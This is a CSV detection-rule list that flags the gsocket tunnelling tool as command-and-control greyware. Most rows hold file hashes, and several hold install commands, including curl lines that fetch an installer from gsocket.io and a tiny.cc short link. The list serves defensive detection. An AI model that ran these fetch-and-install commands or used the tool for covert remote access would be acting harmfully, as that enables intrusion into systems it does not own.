"*88552e15e5ce836e9f7f1b12b55ca6b3805641d577fb71663d2c8fc5fb96ce47*",".{0,1000}88552e15e5ce836e9f7f1b12b55ca6b3805641d577fb71663d2c8fc5fb96ce47.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*8857efba9865de5690af4a3559f4839286cd2083f752ba93c30bd969c6636170*",".{0,1000}8857efba9865de5690af4a3559f4839286cd2083f752ba93c30bd969c6636170.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*89d3c1ac21486c9deb1a08ac10cc6b722a19801163dad4d8b57c1aa8a18f32b8*",".{0,1000}89d3c1ac21486c9deb1a08ac10cc6b722a19801163dad4d8b57c1aa8a18f32b8.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*8a131449c4f5bffc5ae0cda597df9d17a3dff1d02422c890622c0359ee0a03f1*",".{0,1000}8a131449c4f5bffc5ae0cda597df9d17a3dff1d02422c890622c0359ee0a03f1.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*8c7511cc6dae84071080a37c2842782cc0635f8d32301afebdc818a392a58bc3*",".{0,1000}8c7511cc6dae84071080a37c2842782cc0635f8d32301afebdc818a392a58bc3.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*90487bd2731d62d51c5bda9ea313fe915fb6ce31fc2c5f54622d780d924da26e*",".{0,1000}90487bd2731d62d51c5bda9ea313fe915fb6ce31fc2c5f54622d780d924da26e.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*96c7a830d1ec55b1db8892e1d452394cd2a5eb2549003d4428b5d52774637e94*",".{0,1000}96c7a830d1ec55b1db8892e1d452394cd2a5eb2549003d4428b5d52774637e94.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*9abd6408e999901f0b7504eb679d0403f49589b7ecaaa5588923daa0bb22f186*",".{0,1000}9abd6408e999901f0b7504eb679d0403f49589b7ecaaa5588923daa0bb22f186.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*9acdf1fd60fb9b5185fab1f18b843757f05f34f73ce947b71498d494a9e30843*",".{0,1000}9acdf1fd60fb9b5185fab1f18b843757f05f34f73ce947b71498d494a9e30843.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*9c6804a10a191fe49061ca8022394c3a44fba75e20aa0c1fbf79a07e01f28df5*",".{0,1000}9c6804a10a191fe49061ca8022394c3a44fba75e20aa0c1fbf79a07e01f28df5.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*9d780803519141fc8c14c067688184d7df094190cf74825b6ea6651e7ccd911b*",".{0,1000}9d780803519141fc8c14c067688184d7df094190cf74825b6ea6651e7ccd911b.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*9f6a38018fe8228de57605c35bb927d39418c7793bb935ff0ab5022424d9774a*",".{0,1000}9f6a38018fe8228de57605c35bb927d39418c7793bb935ff0ab5022424d9774a.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*a1be92f17090edca27bbb0af8e9ac44b97d7a2dd15b66d09e1a6a6b237ace336*",".{0,1000}a1be92f17090edca27bbb0af8e9ac44b97d7a2dd15b66d09e1a6a6b237ace336.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*a1ce03c2907bdfc7be8ab37b967961a4adb4c2764bbb0f42afea773d1f89f666*",".{0,1000}a1ce03c2907bdfc7be8ab37b967961a4adb4c2764bbb0f42afea773d1f89f666.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*a9b13111606ca8ed948030515217c0e1af7cf2af2af8eb034999ff9e3f071b24*",".{0,1000}a9b13111606ca8ed948030515217c0e1af7cf2af2af8eb034999ff9e3f071b24.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*apt install gsocket*",".{0,1000}apt\sinstall\sgsocket.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*apt-get install gsocket*",".{0,1000}apt\-get\sinstall\sgsocket.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*b035dfbf2f3125fbf0d00f86158efbc4a7c7715f03e4d7bcf634dfd16888e965*",".{0,1000}b035dfbf2f3125fbf0d00f86158efbc4a7c7715f03e4d7bcf634dfd16888e965.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*b3ed38872b50a110a8704d1d2eb4e6e47ed6f2998d1bd08b712f840cc3a4643a*",".{0,1000}b3ed38872b50a110a8704d1d2eb4e6e47ed6f2998d1bd08b712f840cc3a4643a.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*b6e5d9d7d95caf2550fecebcfe6f7c54f1779c6a65547ef342f76446dcbd6c1d*",".{0,1000}b6e5d9d7d95caf2550fecebcfe6f7c54f1779c6a65547ef342f76446dcbd6c1d.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*b7890a15dadef8cdedd6580aed94ca26df6ec0eddb009176dba1eef8941ff6e6*",".{0,1000}b7890a15dadef8cdedd6580aed94ca26df6ec0eddb009176dba1eef8941ff6e6.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*b938ac4eb603113d3617ddcfeb8fbb32a6bbe54b1419482966b41ee8b1dc05b9*",".{0,1000}b938ac4eb603113d3617ddcfeb8fbb32a6bbe54b1419482966b41ee8b1dc05b9.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*bc7229c619a3af7fd330588286b4e48e7804b1c03427ef9e8bb3b7e2eb0318ce*",".{0,1000}bc7229c619a3af7fd330588286b4e48e7804b1c03427ef9e8bb3b7e2eb0318ce.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*bd0f5440775fe02946ffc659425427ef167a1dd6d2993606d4376422f8d33bc4*",".{0,1000}bd0f5440775fe02946ffc659425427ef167a1dd6d2993606d4376422f8d33bc4.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*c08ba6e45d3859ecb3cd5df132fb04dcd86913afce15057de03bba9d256de4ef*",".{0,1000}c08ba6e45d3859ecb3cd5df132fb04dcd86913afce15057de03bba9d256de4ef.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*c2e755a58685ea4f356c897fdc0c9420579f6eae48ac6f27307e8a8b73500cb6*",".{0,1000}c2e755a58685ea4f356c897fdc0c9420579f6eae48ac6f27307e8a8b73500cb6.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*c4da631e510a57e39a6e9021a1d3f1d563f59f351bdd84b46e48a0e27e6b9cbb*",".{0,1000}c4da631e510a57e39a6e9021a1d3f1d563f59f351bdd84b46e48a0e27e6b9cbb.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*c74f294042ccfc39dec052d9871e6bbd4e69b019a353f6e02947303adeac3794*",".{0,1000}c74f294042ccfc39dec052d9871e6bbd4e69b019a353f6e02947303adeac3794.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*cc0ced090edf59964428ab7b16b9cf8ce57b8ee21e999ac05e7f4d5d52b5470c*",".{0,1000}cc0ced090edf59964428ab7b16b9cf8ce57b8ee21e999ac05e7f4d5d52b5470c.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*cd672b609691c61005f4c69233abbce538d334db30e809150f8087b7735bfd2e*",".{0,1000}cd672b609691c61005f4c69233abbce538d334db30e809150f8087b7735bfd2e.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*ce7979010bdb291a0a1884e00e238d9fc3bc27ec7a1d1093be273c22e865f676*",".{0,1000}ce7979010bdb291a0a1884e00e238d9fc3bc27ec7a1d1093be273c22e865f676.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*cfa25f5e4321a86b2c4f646a63345fb6ac46a7089886354ad82653a47e55be51*",".{0,1000}cfa25f5e4321a86b2c4f646a63345fb6ac46a7089886354ad82653a47e55be51.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*cfcad25ab252fbff7fc8a7bbac67915dfce5f76b5738f894fa13afbd5d60a5de*",".{0,1000}cfcad25ab252fbff7fc8a7bbac67915dfce5f76b5738f894fa13afbd5d60a5de.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*curl -fsSL https://gsocket.io/x*",".{0,1000}curl\s\-fsSL\shttps\:\/\/gsocket\.io\/x.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*curl -fsSL https://tiny.cc/gsinst*",".{0,1000}curl\s\-fsSL\shttps\:\/\/tiny\.cc\/gsinst.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*d24fe924f62a3bb95319812d67dbdb7e375d60f7baa933eab82070b3c4a11a77*",".{0,1000}d24fe924f62a3bb95319812d67dbdb7e375d60f7baa933eab82070b3c4a11a77.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*d325c92a9bba538fdbb1c054584ffd0672debaef935dfb27e9d0a6b67649d369*",".{0,1000}d325c92a9bba538fdbb1c054584ffd0672debaef935dfb27e9d0a6b67649d369.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*d69430717f07c774cdb8ea58b32b066e99dbf3cbc046e876b8ea73c20a3a6507*",".{0,1000}d69430717f07c774cdb8ea58b32b066e99dbf3cbc046e876b8ea73c20a3a6507.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*d700c8a3a4ecbb1e547b3c14a5a2a3605cabbabc8350284e923982809945694d*",".{0,1000}d700c8a3a4ecbb1e547b3c14a5a2a3605cabbabc8350284e923982809945694d.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*d748b4244f359f0d9c46860ea8918940c8cd05e4a65c3ae5b99208d719a3a9c1*",".{0,1000}d748b4244f359f0d9c46860ea8918940c8cd05e4a65c3ae5b99208d719a3a9c1.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*d84d9d935f9f3392934ff2613e47032d3120f7c0ac4278a1e88bec65c5316a53*",".{0,1000}d84d9d935f9f3392934ff2613e47032d3120f7c0ac4278a1e88bec65c5316a53.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*db17fa0b10c60bd01a60f64cf436586c9c6708ad64a1dce8350e13689336d67f*",".{0,1000}db17fa0b10c60bd01a60f64cf436586c9c6708ad64a1dce8350e13689336d67f.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*dd226a8ba33f50cd9ca4fedcec4df5c29e6b9841cb8cf2ab2d940bdef8a0a403*",".{0,1000}dd226a8ba33f50cd9ca4fedcec4df5c29e6b9841cb8cf2ab2d940bdef8a0a403.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*de74cc01088879ddf3f7c392345e9229490e06f0cc03c52102b0e94b79c01cfc*",".{0,1000}de74cc01088879ddf3f7c392345e9229490e06f0cc03c52102b0e94b79c01cfc.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*dfd2e8d943aab32e5988a886e6ed0a3bb36b5f5c3959fa3fb1281b6f524b16bb*",".{0,1000}dfd2e8d943aab32e5988a886e6ed0a3bb36b5f5c3959fa3fb1281b6f524b16bb.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*e05dfa6b3fc5b59044f4b18ba455d751c5a18948d1d0a032d3a11fb753659faa*",".{0,1000}e05dfa6b3fc5b59044f4b18ba455d751c5a18948d1d0a032d3a11fb753659faa.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*e417c3eb936ec35eb80f7cab07aaba0c051f3385d8262eaa93e5e59f52cb60e7*",".{0,1000}e417c3eb936ec35eb80f7cab07aaba0c051f3385d8262eaa93e5e59f52cb60e7.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*e660765bee5e704c8f15d6a20c14d720c0aea5382fd21123974df9435a3b7bad*",".{0,1000}e660765bee5e704c8f15d6a20c14d720c0aea5382fd21123974df9435a3b7bad.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*e66ba30f8c2e47462d60db7d5bdcb9465fa63c7115a2287d68f57d191ada1b6e*",".{0,1000}e66ba30f8c2e47462d60db7d5bdcb9465fa63c7115a2287d68f57d191ada1b6e.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*e74e119f6c9d89e2419518395abc0bb44008928d3748b60ea7d02e70b757a75a*",".{0,1000}e74e119f6c9d89e2419518395abc0bb44008928d3748b60ea7d02e70b757a75a.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*e897d08460dbb646108b17a32455d9be51487bee26b48dfef992b7f246d54f1d*",".{0,1000}e897d08460dbb646108b17a32455d9be51487bee26b48dfef992b7f246d54f1d.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*e8bcea5769f7121a256a8d690d1eeae2a6040af90d7d97fccfc0379c241df060*",".{0,1000}e8bcea5769f7121a256a8d690d1eeae2a6040af90d7d97fccfc0379c241df060.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*eb11e2e1f6611560c9822ca53a829028642a676c2d03bbf86c57e4b41fdcff9e*",".{0,1000}eb11e2e1f6611560c9822ca53a829028642a676c2d03bbf86c57e4b41fdcff9e.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*ec7ac72aea879c8a68fe5cbd38f8be5f37c7b3ee99ca67481331b8eba84f7726*",".{0,1000}ec7ac72aea879c8a68fe5cbd38f8be5f37c7b3ee99ca67481331b8eba84f7726.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*ececdc677eaf4bf46268f4839d825090b16a40d37803c38600bf52bc79e1a363*",".{0,1000}ececdc677eaf4bf46268f4839d825090b16a40d37803c38600bf52bc79e1a363.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*ef8eb970940d435e07001fccf2ac210f539a9bb09ea1ef146c5f6ff4cc15a402*",".{0,1000}ef8eb970940d435e07001fccf2ac210f539a9bb09ea1ef146c5f6ff4cc15a402.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*eff4aa3e27c98422705a19de82c1386d11b9559ded06eed46c26ab82860c0a81*",".{0,1000}eff4aa3e27c98422705a19de82c1386d11b9559ded06eed46c26ab82860c0a81.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*f18bc0dae72814ff2e076c2b61846a35d00575c4e1554f74a4a70a036a15f9c5*",".{0,1000}f18bc0dae72814ff2e076c2b61846a35d00575c4e1554f74a4a70a036a15f9c5.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
